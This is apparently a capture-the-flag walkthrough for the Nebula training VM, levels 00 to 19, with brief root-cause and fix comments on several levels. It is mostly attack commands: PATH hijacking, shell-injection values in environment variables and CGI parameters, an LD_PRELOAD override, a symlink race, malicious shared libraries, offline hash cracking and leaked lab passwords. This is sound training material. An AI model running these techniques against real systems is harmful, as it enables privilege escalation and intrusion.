Level 00
$ find / -user flag00 -perm -4000 2>/dev/null
$ /bin/.../flag00
$ /bin/getflag
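Level 01
# Root cause: flag01 apparently runs `echo` by bare name, so the caller's PATH picks the binary a privileged program executes. Fix: absolute paths and a reset environment in setuid code.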
$ ln -s /bin/getflag /tmp/echo
$ PATH=/tmp:$PATH
$ /home/flag01/flag01
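Level 02
# Root cause: the USER environment variable appears to be pasted into a shell command line by flag02. Fix: never build shell commands from caller-controlled environment; take the identity from the kernel (getuid) and exec without a shell.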
$ USER=';/bin/getflag;#'
$ /home/flag02/flag02
Level 03
$ echo -en '#!/bin/sh\n\n/bin/getflag > /tmp/flag03' > /home/flag03/writable.d/l03.sh
$ cat /tmp/flag03
Level 04
$ ln -s /home/flag04/token /tmp/t0k3n
$ /home/flag04/flag04 /tmp/t0k3n
$ su -l flag04
06508b5e-8909-4f38-b630-fdb148a848a2
$ /bin/getflag
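Level 05
# Root cause: a backup archive readable by other users contains an SSH private key (the .ssh/id_rsa used below). Fix: keep backups of home directories owner-only and rotate any key that was exposed.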
$ tar xvzf /home/flag05/.backup/backup-19072011.tgz -C /tmp/.
$ ssh -i /tmp/.ssh/id_rsa flag05@localhost /bin/getflag
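Level 06
# Root cause: the account's 13-character traditional crypt(3) hash sits in world-readable /etc/passwd, so it can be attacked offline. Fix: shadow passwords with a modern, salted, slow hash.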
$ cat /etc/passwd | grep flag06
$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > /tmp/flag06.pw
$ john /tmp/flag06.pw
$ su -l flag06
hello
$ /bin/getflag
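Level 07
# Root cause: the CGI's Host parameter reaches a shell command unvalidated, so `|` starts a second command. Fix: validate the value against a hostname pattern and run the tool with an argument vector, not through a shell.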
$ nc localhost 7007
GET /index.cgi?Host=localhost|/bin/getflag
Level 08
$ wireshark capture.pcap
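# In Wireshark: Follow TCP Stream, then switch the view to Hex Dump (the hex view shows any non-printable bytes typed during the cleartext login).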
$ su -l flag08
backd00Rmate
$ /bin/getflag
Level 09
$ echo '[email ${`/bin/echo;/usr/bin/id;/bin/getflag;/bin/echo`}]' > /tmp/l09
$ /home/flag09/flag09 /tmp/l09
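Level 10
# Root cause: flag10 appears to check the path's permissions and open it in two separate steps, so the symlink can change in between (time-of-check/time-of-use race). Fix: open the file first with privileges dropped, then check the open descriptor with fstat.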
$ nc -v -k -l localhost 18211
$ for i in `seq 1 1000`; do ln -f -s /etc/hostname /tmp/token; /home/flag10/flag10 /tmp/token localhost & ln -f -s /home/flag10/token /tmp/token; done
$ nc -v -k -l localhost 18211
$ su -l flag10
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ /bin/getflag
Level 11
$ PATH=/tmp:$PATH
$ ln -s /bin/getflag /tmp/c
$ cat /tmp/11a.py
$ chmod +x /tmp/11a.py
$ /tmp/11a.py | /home/flag11/flag11
$ TEMP=/tmp
$ cat /tmp/11b.py
$ chmod +x /tmp/11b.py
$ /tmp/11b.py | /home/flag11/flag11
Level 12
$ nc localhost 50001
4754a4f4bd5787accd33de887b9250a0691dd198; /bin/getflag > /tmp/flag12 #
$ cat /tmp/flag12
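Level 13
# Root cause: the token is apparently guarded only by a getuid() comparison inside a binary the user can copy and run unprivileged, where LD_PRELOAD is honoured. Fix: do not embed secrets in a readable binary; a UID check in caller-run code is not an access control.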
$ cp /home/flag13/flag13 /tmp/.
$ echo 'int getuid() { return 1000; }' > /tmp/libfake.c
$ gcc -shared /tmp/libfake.c -o /tmp/libfake.so
$ LD_PRELOAD=/tmp/libfake.so /tmp/flag13
$ su -l flag13
b705702b-76a8-42b0-8844-3adabbe5ac58
$ /bin/getflag
Level 14
$ /home/flag14/flag14 -e
$ cat /home/flag14/token
$ cat /tmp/l14.py
$ /tmp/l14.py 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
$ su -l flag14
8457c118-887c-4e40-a5a6-33a25353165
$ /bin/getflag
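Level 15
# Root cause: per the strace output, flag15 appears to search /var/tmp/flag15 for shared libraries, a directory other users can write to. Fix: no RPATH/RUNPATH pointing at writable locations in privileged binaries.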
$ strace /home/flag15/flag15
$ cat /tmp/libfake.c
$ cat /tmp/version
$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=/tmp/version,-Bstatic -o /var/tmp/flag15/libc.so.6 /tmp/libfake.c
$ /home/flag15/flag15
$ /bin/getflag
Level 16
$ cat /tmp/L16
$ nc localhost 1616
GET /index.cgi?username=`/*/L16`
$ cat /tmp/flag16
Level 17
$ cat /tmp/l17.py
$ python /tmp/l17.py
$ cat /tmp/flag17
Level 18
$ cat /tmp/Starting
$ chmod +x /tmp/Starting
$ PATH=/tmp:$PATH
$ python -c "print 'login me\n'*1021 + 'closelog\n'*1021 + 'shell\n'" | /home/flag18/flag18 --rcfile -d /tmp/debug -v -v -v 2> /dev/null
Level 19
$ cat /tmp/fork.c
$ gcc -o /tmp/fork /tmp/fork.c
$ /tmp/fork
$
$ cat /tmp/fork.py
$ python /tmp/fork.py
$
Reference
https://exploit-exercises.com/nebula/